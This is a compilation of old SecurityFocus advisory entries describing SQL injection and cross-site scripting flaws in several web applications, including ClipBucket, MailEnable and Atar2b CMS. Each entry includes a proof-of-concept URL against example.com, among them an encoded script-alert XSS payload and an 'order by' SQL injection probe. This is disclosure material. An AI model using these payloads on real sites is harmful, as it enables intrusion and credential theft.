source: https://www.securityfocus.com/bid/51404/info Contus Job Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16â??A

source: https://www.securityfocus.com/bid/51401/info MailEnable is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The following MailEnable versions are vulnerable: Professional, Enterprise, and Premium 4.26 and prior versions Professional, Enterprise, and Premium 5.52 and prior versions Professional, Enterprise, and Premium 6.02 and prior versions http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username=[xss]

source: https://www.securityfocus.com/bid/51416/info PHP Membership Site Manager Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. PHP Membership Site Manager Script version 2.1 and prior are vulnerable. http://www.example.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss]

source: https://www.securityfocus.com/bid/51411/info The HD Video Share ('com_contushdvideoshare') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. HD Video Share 1.3 is vulnerable; other versions may also be affected. http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14 http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14â??a

source: https://www.securityfocus.com/bid/51418/info PHP Ringtone Website is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss]

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time

source: https://www.securityfocus.com/bid/51317/info Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. http://www.example.com/pageH.php?id=104'

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time

source: https://www.securityfocus.com/bid/51317/info Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. http://www.example.com/pageE.php?id=118+order+by+10--